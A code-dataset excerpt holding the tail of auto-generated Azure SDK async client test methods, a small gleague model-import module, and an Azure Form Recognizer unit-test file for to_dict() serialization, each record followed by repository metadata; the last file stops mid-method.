    :param body_parameter: A mapping shaped like ``{"value": ["str"]}`` (``value`` optional).
    :type body_parameter: JSONType
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    # A missing body serializes as a JSON null payload.
    _json = body_parameter if body_parameter is not None else None
    http_request = build_explicit_post_optional_array_property_request(
        content_type=content_type,
        json=_json,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_optional_array_property.metadata = {"url": "/reqopt/optional/array/property"}  # type: ignore
@distributed_trace_async
async def post_required_array_header(self, *, header_parameter: List[str], **kwargs: Any) -> None:
    """Test explicitly required array. Please put a header 'headerParameter' => null and the client
    library should throw before the request is sent.

    :keyword header_parameter:
    :paramtype header_parameter: list[str]
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses translated to dedicated azure-core exceptions; callers may
    # override individual entries via the ``error_map`` keyword.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    http_request = build_explicit_post_required_array_header_request(
        header_parameter=header_parameter,
    )
    http_request.url = self._client.format_url(http_request.url)
    pipeline_result = await self._client._pipeline.run(http_request, stream=False, **kwargs)
    raw = pipeline_result.http_response
    if raw.status_code != 200:
        map_error(status_code=raw.status_code, response=raw, error_map=error_map)
        raise HttpResponseError(response=raw)
    if cls:
        return cls(pipeline_result, None, {})

post_required_array_header.metadata = {"url": "/reqopt/requied/array/header"}  # type: ignore
@distributed_trace_async
async def post_optional_array_header(self, *, header_parameter: Optional[List[str]] = None, **kwargs: Any) -> None:
    """Test explicitly optional array. Please put a header 'headerParameter' => null.

    :keyword header_parameter:
    :paramtype header_parameter: list[str]
    :return: None
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    # Statuses mapped to dedicated azure-core exceptions; callers may override
    # individual entries via the ``error_map`` keyword argument.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop("error_map", {}))
    request = build_explicit_post_optional_array_header_request(
        header_parameter=header_parameter,
    )
    # Resolve the relative path against the client's configured base URL.
    request.url = self._client.format_url(request.url)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response)
    if cls:
        return cls(pipeline_response, None, {})

post_optional_array_header.metadata = {"url": "/reqopt/optional/array/header"}  # type: ignore
| 40.383634
| 119
| 0.662732
| 5,866
| 53,791
| 5.825094
| 0.033583
| 0.03746
| 0.033714
| 0.030202
| 0.962365
| 0.93266
| 0.926368
| 0.918086
| 0.879982
| 0.866725
| 0
| 0.009596
| 0.242531
| 53,791
| 1,331
| 120
| 40.413974
| 0.829034
| 0.049767
| 0
| 0.73487
| 0
| 0
| 0.053828
| 0.028484
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002882
| false
| 0
| 0.012968
| 0
| 0.064842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa22b65ffc3d23b926aefe1ec6335173c8489bfb
| 400
|
py
|
Python
|
gleague/gleague/models/__init__.py
|
Nuqlear/genkstaleague
|
664ed1d3ebea9c43053546fc2d658083cc16526b
|
[
"MIT"
] | 7
|
2015-08-18T01:21:48.000Z
|
2021-04-30T03:10:38.000Z
|
gleague/gleague/models/__init__.py
|
Nuqlear/genkstaleague
|
664ed1d3ebea9c43053546fc2d658083cc16526b
|
[
"MIT"
] | 1
|
2019-04-28T10:02:39.000Z
|
2019-05-06T08:11:56.000Z
|
gleague/gleague/models/__init__.py
|
Nuqlear/genkstaleague
|
664ed1d3ebea9c43053546fc2d658083cc16526b
|
[
"MIT"
] | 3
|
2015-08-14T09:42:25.000Z
|
2018-11-08T07:07:58.000Z
|
from gleague.models.player import Player
from gleague.models.season import Season
from gleague.models.season import SeasonStats
from gleague.models.match import Match
from gleague.models.match import Role
from gleague.models.match import CMPicksBans
from gleague.models.match import PlayerMatchItem
from gleague.models.match import PlayerMatchStats
from gleague.models.match import PlayerMatchRating
| 40
| 50
| 0.865
| 54
| 400
| 6.407407
| 0.240741
| 0.286127
| 0.442197
| 0.381503
| 0.653179
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09
| 400
| 9
| 51
| 44.444444
| 0.950549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fa46c16dad7c0e4298fb108fc6fc3abc8c2938b6
| 37,919
|
py
|
Python
|
sdk/formrecognizer/azure-ai-formrecognizer/tests/test_to_dict_v2.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/formrecognizer/azure-ai-formrecognizer/tests/test_to_dict_v2.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/formrecognizer/azure-ai-formrecognizer/tests/test_to_dict_v2.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from datetime import datetime
from azure.ai.formrecognizer import _models
from testcase import FormRecognizerTest
class TestToDict(FormRecognizerTest):
def test_point_to_dict(self):
    """Point.to_dict should produce plain ``{"x": ..., "y": ...}`` mappings."""
    points = [_models.Point(1, 2), _models.Point(3, 4)]
    expected = [
        {"x": 1, "y": 2},
        {"x": 3, "y": 4},
    ]
    assert [pt.to_dict() for pt in points] == expected
def test_form_word_to_dict(self):
    """FormWord.to_dict should emit text, bounding box, confidence, page number,
    and a fixed kind of "word"."""
    word = _models.FormWord(
        text="word",
        confidence=0.92,
        page_number=1,
        bounding_box=[
            _models.Point(1427.0, 1669.0),
            _models.Point(1527.0, 1669.0),
            _models.Point(1527.0, 1698.0),
            _models.Point(1427.0, 1698.0),
        ],
    )
    expected = {
        "text": "word",
        "bounding_box": [
            {"x": 1427.0, "y": 1669.0},
            {"x": 1527.0, "y": 1669.0},
            {"x": 1527.0, "y": 1698.0},
            {"x": 1427.0, "y": 1698.0},
        ],
        "confidence": 0.92,
        "page_number": 1,
        "kind": "word",
    }
    assert word.to_dict() == expected
def test_form_line_to_dict(self):
    """FormLine.to_dict should serialize text, bounding box, child words,
    page number, appearance, and a fixed kind of "line"."""
    form_line = _models.FormLine(
        text="sample line",
        bounding_box=[
            _models.Point(1427.0, 1669.0),
            _models.Point(1527.0, 1669.0),
            _models.Point(1527.0, 1698.0),
            _models.Point(1427.0, 1698.0),
        ],
        words=[
            _models.FormWord(
                text="sample",
                confidence=0.92,
                page_number=1,
                bounding_box=[
                    _models.Point(1427.0, 1669.0),
                    _models.Point(1527.0, 1669.0),
                    _models.Point(1527.0, 1698.0),
                    _models.Point(1427.0, 1698.0),
                ],
            ),
            _models.FormWord(
                text="line",
                confidence=0.92,
                page_number=1,
                bounding_box=[
                    _models.Point(1427.0, 1669.0),
                    _models.Point(1527.0, 1669.0),
                    _models.Point(1527.0, 1698.0),
                    _models.Point(1427.0, 1698.0),
                ],
            ),
        ],
        page_number=2,
        appearance=_models.TextAppearance(
            style_name="other", style_confidence=0.90
        ),
    )
    d = form_line.to_dict()
    # Expected plain-dict form; nested FormWords serialize with kind "word".
    final = {
        "text": "sample line",
        "bounding_box": [
            {"x": 1427.0, "y": 1669.0},
            {"x": 1527.0, "y": 1669.0},
            {"x": 1527.0, "y": 1698.0},
            {"x": 1427.0, "y": 1698.0},
        ],
        "words": [
            {
                "text": "sample",
                "bounding_box": [
                    {"x": 1427.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1698.0},
                    {"x": 1427.0, "y": 1698.0},
                ],
                "confidence": 0.92,
                "page_number": 1,
                "kind": "word",
            },
            {
                "text": "line",
                "bounding_box": [
                    {"x": 1427.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1698.0},
                    {"x": 1427.0, "y": 1698.0},
                ],
                "confidence": 0.92,
                "page_number": 1,
                "kind": "word",
            },
        ],
        "page_number": 2,
        "kind": "line",
        "appearance": {"style_name": "other", "style_confidence": 0.90},
    }
    assert d == final
def test_form_selection_mark_to_dict(self):
    """FormSelectionMark.to_dict should emit text, state, bounding box,
    confidence, page number, and a fixed kind of "selectionMark"."""
    mark = _models.FormSelectionMark(
        text="checkbox",
        state="selected",
        confidence=0.92,
        page_number=1,
        bounding_box=[
            _models.Point(1427.0, 1669.0),
            _models.Point(1527.0, 1669.0),
            _models.Point(1527.0, 1698.0),
            _models.Point(1427.0, 1698.0),
        ],
    )
    expected = {
        "text": "checkbox",
        "state": "selected",
        "bounding_box": [
            {"x": 1427.0, "y": 1669.0},
            {"x": 1527.0, "y": 1669.0},
            {"x": 1527.0, "y": 1698.0},
            {"x": 1427.0, "y": 1698.0},
        ],
        "confidence": 0.92,
        "page_number": 1,
        "kind": "selectionMark",
    }
    assert mark.to_dict() == expected
def test_form_element_to_dict(self):
    """FormElement.to_dict should carry text, bounding box, page number,
    and the kind supplied at construction time."""
    element = _models.FormElement(
        kind="selectionMark",
        text="element",
        page_number=1,
        bounding_box=[
            _models.Point(1427.0, 1669.0),
            _models.Point(1527.0, 1669.0),
            _models.Point(1527.0, 1698.0),
            _models.Point(1427.0, 1698.0),
        ],
    )
    expected = {
        "text": "element",
        "bounding_box": [
            {"x": 1427.0, "y": 1669.0},
            {"x": 1527.0, "y": 1669.0},
            {"x": 1527.0, "y": 1698.0},
            {"x": 1427.0, "y": 1698.0},
        ],
        "page_number": 1,
        "kind": "selectionMark",
    }
    assert element.to_dict() == expected
def test_text_appearance_to_dict(self):
    """TextAppearance.to_dict should flatten style name and confidence."""
    appearance = _models.TextAppearance(style_name="other", style_confidence=0.98)
    expected = {"style_name": "other", "style_confidence": 0.98}
    assert appearance.to_dict() == expected
def test_field_data_to_dict(self):
    """FieldData.to_dict should serialize text, bounding box, page number,
    and nested field elements (here a single FormWord)."""
    model = _models.FieldData(
        text="element",
        page_number=1,
        bounding_box=[
            _models.Point(1427.0, 1669.0),
            _models.Point(1527.0, 1669.0),
            _models.Point(1527.0, 1698.0),
            _models.Point(1427.0, 1698.0),
        ],
        field_elements=[
            _models.FormWord(
                text="word",
                confidence=0.92,
                page_number=1,
                bounding_box=[
                    _models.Point(1427.0, 1669.0),
                    _models.Point(1527.0, 1669.0),
                    _models.Point(1527.0, 1698.0),
                    _models.Point(1427.0, 1698.0),
                ],
            ),
        ],
    )
    d = model.to_dict()
    # Nested FormWord elements serialize with kind "word".
    final = {
        "text": "element",
        "bounding_box": [
            {"x": 1427.0, "y": 1669.0},
            {"x": 1527.0, "y": 1669.0},
            {"x": 1527.0, "y": 1698.0},
            {"x": 1427.0, "y": 1698.0},
        ],
        "page_number": 1,
        "field_elements": [
            {
                "text": "word",
                "bounding_box": [
                    {"x": 1427.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1698.0},
                    {"x": 1427.0, "y": 1698.0},
                ],
                "confidence": 0.92,
                "page_number": 1,
                "kind": "word",
            }
        ],
    }
    assert d == final
def test_form_field_to_dict(self):
    """FormField.to_dict should serialize value type, label/value FieldData,
    name, value, and confidence; FieldData without elements serializes with an
    empty ``field_elements`` list."""
    form_field = _models.FormField(
        value_type="phoneNumber",
        label_data=_models.FieldData(
            text="phone",
            page_number=1,
            bounding_box=[
                _models.Point(1427.0, 1669.0),
                _models.Point(1527.0, 1669.0),
                _models.Point(1527.0, 1698.0),
                _models.Point(1427.0, 1698.0),
            ],
        ),
        value_data=_models.FieldData(
            text="55554444",
            page_number=1,
            bounding_box=[
                _models.Point(1427.0, 1669.0),
                _models.Point(1527.0, 1669.0),
                _models.Point(1527.0, 1698.0),
                _models.Point(1427.0, 1698.0),
            ],
        ),
        name="phone",
        value="55554444",
        confidence=0.99,
    )
    d = form_field.to_dict()
    final = {
        "value_type": "phoneNumber",
        "label_data": {
            "text": "phone",
            "bounding_box": [
                {"x": 1427.0, "y": 1669.0},
                {"x": 1527.0, "y": 1669.0},
                {"x": 1527.0, "y": 1698.0},
                {"x": 1427.0, "y": 1698.0},
            ],
            "page_number": 1,
            "field_elements": []
        },
        "value_data": {
            "text": "55554444",
            "bounding_box": [
                {"x": 1427.0, "y": 1669.0},
                {"x": 1527.0, "y": 1669.0},
                {"x": 1527.0, "y": 1698.0},
                {"x": 1427.0, "y": 1698.0},
            ],
            "page_number": 1,
            "field_elements": []
        },
        "name": "phone",
        "value": "55554444",
        "confidence": 0.99,
    }
    assert d == final
def test_recognized_form_to_dict(self):
    """RecognizedForm.to_dict should serialize the full tree: form metadata,
    page range, fields (FormField), and pages (FormPage with nested FormLine
    and FormWord children); absent page collections serialize as empty lists."""
    form = _models.RecognizedForm(
        form_type="test_form",
        form_type_confidence="0.84",
        model_id="examplemodel123",
        page_range=_models.FormPageRange(1, 1),
        fields={
            "example": _models.FormField(
                value_type="phoneNumber",
                label_data=_models.FieldData(
                    text="phone",
                    page_number=1,
                    bounding_box=[
                        _models.Point(1427.0, 1669.0),
                        _models.Point(1527.0, 1669.0),
                        _models.Point(1527.0, 1698.0),
                        _models.Point(1427.0, 1698.0),
                    ],
                ),
                value_data=_models.FieldData(
                    text="55554444",
                    page_number=1,
                    bounding_box=[
                        _models.Point(1427.0, 1669.0),
                        _models.Point(1527.0, 1669.0),
                        _models.Point(1527.0, 1698.0),
                        _models.Point(1427.0, 1698.0),
                    ],
                ),
                name="phone",
                value="55554444",
                confidence=0.99,
            )
        },
        pages=[_models.FormPage(
            page_number=1,
            text_angle=180.0,
            width=5.5,
            height=8.0,
            unit="pixel",
            lines=[_models.FormLine(
                text="sample line",
                bounding_box=[
                    _models.Point(1427.0, 1669.0),
                    _models.Point(1527.0, 1669.0),
                    _models.Point(1527.0, 1698.0),
                    _models.Point(1427.0, 1698.0),
                ],
                words=[
                    _models.FormWord(
                        text="sample",
                        confidence=0.92,
                        page_number=1,
                        bounding_box=[
                            _models.Point(1427.0, 1669.0),
                            _models.Point(1527.0, 1669.0),
                            _models.Point(1527.0, 1698.0),
                            _models.Point(1427.0, 1698.0),
                        ],
                    ),
                    _models.FormWord(
                        text="line",
                        confidence=0.92,
                        page_number=1,
                        bounding_box=[
                            _models.Point(1427.0, 1669.0),
                            _models.Point(1527.0, 1669.0),
                            _models.Point(1527.0, 1698.0),
                            _models.Point(1427.0, 1698.0),
                        ],
                    ),
                ],
                page_number=2,
                appearance=_models.TextAppearance(
                    style_name="other", style_confidence=0.90
                ),
            )],
        )
        ]
    )
    d = form.to_dict()
    # Expected plain-dict tree; note the empty selection_marks/tables lists on
    # the page and the fixed "word"/"line" kinds on nested elements.
    final = {
        "form_type": "test_form",
        "form_type_confidence": "0.84",
        "model_id": "examplemodel123",
        "page_range": {"first_page_number": 1, "last_page_number": 1},
        "fields": {
            "example": {
                "value_type": "phoneNumber",
                "label_data": {
                    "text": "phone",
                    "bounding_box": [
                        {"x": 1427.0, "y": 1669.0},
                        {"x": 1527.0, "y": 1669.0},
                        {"x": 1527.0, "y": 1698.0},
                        {"x": 1427.0, "y": 1698.0},
                    ],
                    "page_number": 1,
                    "field_elements": []
                },
                "value_data": {
                    "text": "55554444",
                    "bounding_box": [
                        {"x": 1427.0, "y": 1669.0},
                        {"x": 1527.0, "y": 1669.0},
                        {"x": 1527.0, "y": 1698.0},
                        {"x": 1427.0, "y": 1698.0},
                    ],
                    "page_number": 1,
                    "field_elements": []
                },
                "name": "phone",
                "value": "55554444",
                "confidence": 0.99,
            }
        },
        "pages": [{
            "page_number": 1,
            "text_angle": 180.0,
            "width": 5.5,
            "height": 8.0,
            "unit": "pixel",
            "lines": [{
                "text": "sample line",
                "bounding_box": [
                    {"x": 1427.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1698.0},
                    {"x": 1427.0, "y": 1698.0},
                ],
                "words": [
                    {
                        "text": "sample",
                        "bounding_box": [
                            {"x": 1427.0, "y": 1669.0},
                            {"x": 1527.0, "y": 1669.0},
                            {"x": 1527.0, "y": 1698.0},
                            {"x": 1427.0, "y": 1698.0},
                        ],
                        "confidence": 0.92,
                        "page_number": 1,
                        "kind": "word",
                    },
                    {
                        "text": "line",
                        "bounding_box": [
                            {"x": 1427.0, "y": 1669.0},
                            {"x": 1527.0, "y": 1669.0},
                            {"x": 1527.0, "y": 1698.0},
                            {"x": 1427.0, "y": 1698.0},
                        ],
                        "confidence": 0.92,
                        "page_number": 1,
                        "kind": "word",
                    },
                ],
                "page_number": 2,
                "kind": "line",
                "appearance": {"style_name": "other", "style_confidence": 0.90},
            }],
            "selection_marks": [],
            "tables": [],
        }],
    }
    assert d == final
def test_form_page_to_dict(self):
    """FormPage.to_dict() serializes page metadata plus nested tables,
    lines (with their words and appearance), and selection marks into
    plain dicts, adding the "kind" discriminator to each element."""
    # Build a FormPage with one table (one cell holding one word element),
    # one line of two words, and one selection mark.
    form_page = _models.FormPage(
        page_number=1,
        text_angle=180.0,
        width=5.5,
        height=8.0,
        unit="pixel",
        tables=[
            _models.FormTable(
                page_number=2,
                cells=[
                    _models.FormTableCell(
                        text="info",
                        row_index=1,
                        column_index=3,
                        row_span=1,
                        column_span=2,
                        bounding_box=[
                            _models.Point(1427.0, 1669.0),
                            _models.Point(1527.0, 1669.0),
                            _models.Point(1527.0, 1698.0),
                            _models.Point(1427.0, 1698.0),
                        ],
                        confidence=0.87,
                        is_header=False,
                        is_footer=True,
                        page_number=1,
                        field_elements=[
                            _models.FormWord(
                                text="word",
                                confidence=0.92,
                                page_number=1,
                                bounding_box=[
                                    _models.Point(1427.0, 1669.0),
                                    _models.Point(1527.0, 1669.0),
                                    _models.Point(1527.0, 1698.0),
                                    _models.Point(1427.0, 1698.0),
                                ],
                            ),
                        ]
                    )
                ],
                row_count=10,
                column_count=5,
                bounding_box=[
                    _models.Point(1427.0, 1669.0),
                    _models.Point(1527.0, 1669.0),
                    _models.Point(1527.0, 1698.0),
                    _models.Point(1427.0, 1698.0),
                ],
            ),
        ],
        lines=[_models.FormLine(
            text="sample line",
            bounding_box=[
                _models.Point(1427.0, 1669.0),
                _models.Point(1527.0, 1669.0),
                _models.Point(1527.0, 1698.0),
                _models.Point(1427.0, 1698.0),
            ],
            words=[
                _models.FormWord(
                    text="sample",
                    confidence=0.92,
                    page_number=1,
                    bounding_box=[
                        _models.Point(1427.0, 1669.0),
                        _models.Point(1527.0, 1669.0),
                        _models.Point(1527.0, 1698.0),
                        _models.Point(1427.0, 1698.0),
                    ],
                ),
                _models.FormWord(
                    text="line",
                    confidence=0.92,
                    page_number=1,
                    bounding_box=[
                        _models.Point(1427.0, 1669.0),
                        _models.Point(1527.0, 1669.0),
                        _models.Point(1527.0, 1698.0),
                        _models.Point(1427.0, 1698.0),
                    ],
                ),
            ],
            page_number=2,
            appearance=_models.TextAppearance(
                style_name="other", style_confidence=0.90
            ),
        ),
        ],
        selection_marks=[_models.FormSelectionMark(
            text="checkbox",
            state="selected",
            confidence=0.92,
            page_number=1,
            bounding_box=[
                _models.Point(1427.0, 1669.0),
                _models.Point(1527.0, 1669.0),
                _models.Point(1527.0, 1698.0),
                _models.Point(1427.0, 1698.0),
            ],
        ),
        ],
    )
    d = form_page.to_dict()
    # Expected plain-dict serialization; Points become {"x": ..., "y": ...}
    # and each element carries a "kind" key ("word"/"line"/"selectionMark").
    final = {
        "page_number": 1,
        "text_angle": 180.0,
        "width": 5.5,
        "height": 8.0,
        "unit": "pixel",
        "tables": [
            {"cells": [
                {
                    "text": "info",
                    "bounding_box": [
                        {"x": 1427.0, "y": 1669.0},
                        {"x": 1527.0, "y": 1669.0},
                        {"x": 1527.0, "y": 1698.0},
                        {"x": 1427.0, "y": 1698.0},
                    ],
                    "row_index": 1,
                    "column_index": 3,
                    "row_span": 1,
                    "column_span": 2,
                    "confidence": 0.87,
                    "is_header": False,
                    "is_footer": True,
                    "page_number": 1,
                    "field_elements": [
                        {
                            "text": "word",
                            "bounding_box": [
                                {"x": 1427.0, "y": 1669.0},
                                {"x": 1527.0, "y": 1669.0},
                                {"x": 1527.0, "y": 1698.0},
                                {"x": 1427.0, "y": 1698.0},
                            ],
                            "confidence": 0.92,
                            "page_number": 1,
                            "kind": "word",
                        }
                    ],
                },
            ],
            "page_number": 2,
            "row_count": 10,
            "column_count": 5,
            "bounding_box": [
                {"x": 1427.0, "y": 1669.0},
                {"x": 1527.0, "y": 1669.0},
                {"x": 1527.0, "y": 1698.0},
                {"x": 1427.0, "y": 1698.0},
            ],
            },
        ],
        "lines": [{
            "text": "sample line",
            "bounding_box": [
                {"x": 1427.0, "y": 1669.0},
                {"x": 1527.0, "y": 1669.0},
                {"x": 1527.0, "y": 1698.0},
                {"x": 1427.0, "y": 1698.0},
            ],
            "words": [
                {
                    "text": "sample",
                    "bounding_box": [
                        {"x": 1427.0, "y": 1669.0},
                        {"x": 1527.0, "y": 1669.0},
                        {"x": 1527.0, "y": 1698.0},
                        {"x": 1427.0, "y": 1698.0},
                    ],
                    "confidence": 0.92,
                    "page_number": 1,
                    "kind": "word",
                },
                {
                    "text": "line",
                    "bounding_box": [
                        {"x": 1427.0, "y": 1669.0},
                        {"x": 1527.0, "y": 1669.0},
                        {"x": 1527.0, "y": 1698.0},
                        {"x": 1427.0, "y": 1698.0},
                    ],
                    "confidence": 0.92,
                    "page_number": 1,
                    "kind": "word",
                },
            ],
            "page_number": 2,
            "kind": "line",
            "appearance": {"style_name": "other", "style_confidence": 0.90},
        }],
        "selection_marks": [{
            "text": "checkbox",
            "state": "selected",
            "bounding_box": [
                {"x": 1427.0, "y": 1669.0},
                {"x": 1527.0, "y": 1669.0},
                {"x": 1527.0, "y": 1698.0},
                {"x": 1427.0, "y": 1698.0},
            ],
            "confidence": 0.92,
            "page_number": 1,
            "kind": "selectionMark",
        }],
    }
    assert d == final
def test_form_table_cell_to_dict(self):
    """FormTableCell.to_dict() serializes cell geometry, header/footer
    flags, and nested field elements into plain dicts."""
    table_cell = _models.FormTableCell(
        text="info",
        row_index=1,
        column_index=3,
        row_span=1,
        column_span=2,
        bounding_box=[
            _models.Point(1427.0, 1669.0),
            _models.Point(1527.0, 1669.0),
            _models.Point(1527.0, 1698.0),
            _models.Point(1427.0, 1698.0),
        ],
        confidence=0.87,
        is_header=False,
        is_footer=True,
        page_number=1,
        field_elements=[
            _models.FormWord(
                text="word",
                confidence=0.92,
                page_number=1,
                bounding_box=[
                    _models.Point(1427.0, 1669.0),
                    _models.Point(1527.0, 1669.0),
                    _models.Point(1527.0, 1698.0),
                    _models.Point(1427.0, 1698.0),
                ],
            ),
        ]
    )
    d = table_cell.to_dict()
    # Expected plain-dict form; the nested FormWord gains "kind": "word".
    final = {
        "text": "info",
        "bounding_box": [
            {"x": 1427.0, "y": 1669.0},
            {"x": 1527.0, "y": 1669.0},
            {"x": 1527.0, "y": 1698.0},
            {"x": 1427.0, "y": 1698.0},
        ],
        "row_index": 1,
        "column_index": 3,
        "row_span": 1,
        "column_span": 2,
        "confidence": 0.87,
        "is_header": False,
        "is_footer": True,
        "page_number": 1,
        "field_elements": [
            {
                "text": "word",
                "bounding_box": [
                    {"x": 1427.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1698.0},
                    {"x": 1427.0, "y": 1698.0},
                ],
                "confidence": 0.92,
                "page_number": 1,
                "kind": "word",
            }
        ],
    }
    assert d == final
def test_form_table_to_dict(self):
    """FormTable.to_dict() serializes table dimensions, bounding box,
    and nested cells (including their field elements) into plain dicts."""
    table = _models.FormTable(
        page_number=2,
        cells=[
            _models.FormTableCell(
                text="info",
                row_index=1,
                column_index=3,
                row_span=1,
                column_span=2,
                bounding_box=[
                    _models.Point(1427.0, 1669.0),
                    _models.Point(1527.0, 1669.0),
                    _models.Point(1527.0, 1698.0),
                    _models.Point(1427.0, 1698.0),
                ],
                confidence=0.87,
                is_header=False,
                is_footer=True,
                page_number=1,
                field_elements=[
                    _models.FormWord(
                        text="word",
                        confidence=0.92,
                        page_number=1,
                        bounding_box=[
                            _models.Point(1427.0, 1669.0),
                            _models.Point(1527.0, 1669.0),
                            _models.Point(1527.0, 1698.0),
                            _models.Point(1427.0, 1698.0),
                        ],
                    ),
                ]
            )
        ],
        row_count=10,
        column_count=5,
        bounding_box=[
            _models.Point(1427.0, 1669.0),
            _models.Point(1527.0, 1669.0),
            _models.Point(1527.0, 1698.0),
            _models.Point(1427.0, 1698.0),
        ],
    )
    d = table.to_dict()
    # Expected plain-dict form; Points become {"x": ..., "y": ...} maps.
    final = {
        "cells": [
            {
                "text": "info",
                "bounding_box": [
                    {"x": 1427.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1669.0},
                    {"x": 1527.0, "y": 1698.0},
                    {"x": 1427.0, "y": 1698.0},
                ],
                "row_index": 1,
                "column_index": 3,
                "row_span": 1,
                "column_span": 2,
                "confidence": 0.87,
                "is_header": False,
                "is_footer": True,
                "page_number": 1,
                "field_elements": [
                    {
                        "text": "word",
                        "bounding_box": [
                            {"x": 1427.0, "y": 1669.0},
                            {"x": 1527.0, "y": 1669.0},
                            {"x": 1527.0, "y": 1698.0},
                            {"x": 1427.0, "y": 1698.0},
                        ],
                        "confidence": 0.92,
                        "page_number": 1,
                        "kind": "word",
                    }
                ],
            },
        ],
        "page_number": 2,
        "row_count": 10,
        "column_count": 5,
        "bounding_box": [
            {"x": 1427.0, "y": 1669.0},
            {"x": 1527.0, "y": 1669.0},
            {"x": 1527.0, "y": 1698.0},
            {"x": 1427.0, "y": 1698.0},
        ],
    }
    assert d == final
def test_custom_form_model_properties_to_dict(self):
    """CustomFormModelProperties.to_dict() round-trips its single flag."""
    props = _models.CustomFormModelProperties(is_composed_model=True)
    expected = {"is_composed_model": True}
    assert props.to_dict() == expected
def test_account_properties_to_dict(self):
    """AccountProperties.to_dict() emits both model-count attributes."""
    props = _models.AccountProperties(custom_model_count=5, custom_model_limit=10)
    expected = {
        "custom_model_count": 5,
        "custom_model_limit": 10,
    }
    assert props.to_dict() == expected
def test_custom_form_model_info_to_dict(self):
    """CustomFormModelInfo.to_dict() serializes scalars, datetimes,
    and the nested properties object."""
    # The same timestamp is used for start and completion; equality with
    # two identical datetime instances is unchanged.
    timestamp = datetime(2021, 1, 10, 23, 55, 59, 342380)
    info = _models.CustomFormModelInfo(
        model_id="1234",
        status="creating",
        training_started_on=timestamp,
        training_completed_on=timestamp,
        model_name="sample_model",
        properties=_models.CustomFormModelProperties(is_composed_model=False),
    )
    expected = {
        "model_id": "1234",
        "status": "creating",
        "training_started_on": timestamp,
        "training_completed_on": timestamp,
        "model_name": "sample_model",
        "properties": {"is_composed_model": False},
    }
    assert info.to_dict() == expected
def test_form_recognizer_error_to_dict(self):
    """FormRecognizerError.to_dict() emits its code and message."""
    err = _models.FormRecognizerError(code=404, message="error not found")
    expected = {"code": 404, "message": "error not found"}
    assert err.to_dict() == expected
def test_training_document_info_to_dict(self):
    """TrainingDocumentInfo.to_dict() serializes scalars and the nested
    error list."""
    doc_info = _models.TrainingDocumentInfo(
        name="sample doc",
        status="succeeded",
        page_count=3,
        errors=[_models.FormRecognizerError(code=404, message="error not found")],
        model_id="1234",
    )
    expected = {
        "name": "sample doc",
        "status": "succeeded",
        "page_count": 3,
        "errors": [{"code": 404, "message": "error not found"}],
        "model_id": "1234",
    }
    assert doc_info.to_dict() == expected
def test_custom_form_model_field_to_dict(self):
    """CustomFormModelField.to_dict() emits label, name, and accuracy."""
    field = _models.CustomFormModelField(
        label="field_label",
        name="field",
        accuracy=0.98,
    )
    expected = {
        "label": "field_label",
        "name": "field",
        "accuracy": 0.98,
    }
    assert field.to_dict() == expected
def test_custom_form_submodel_to_dict(self):
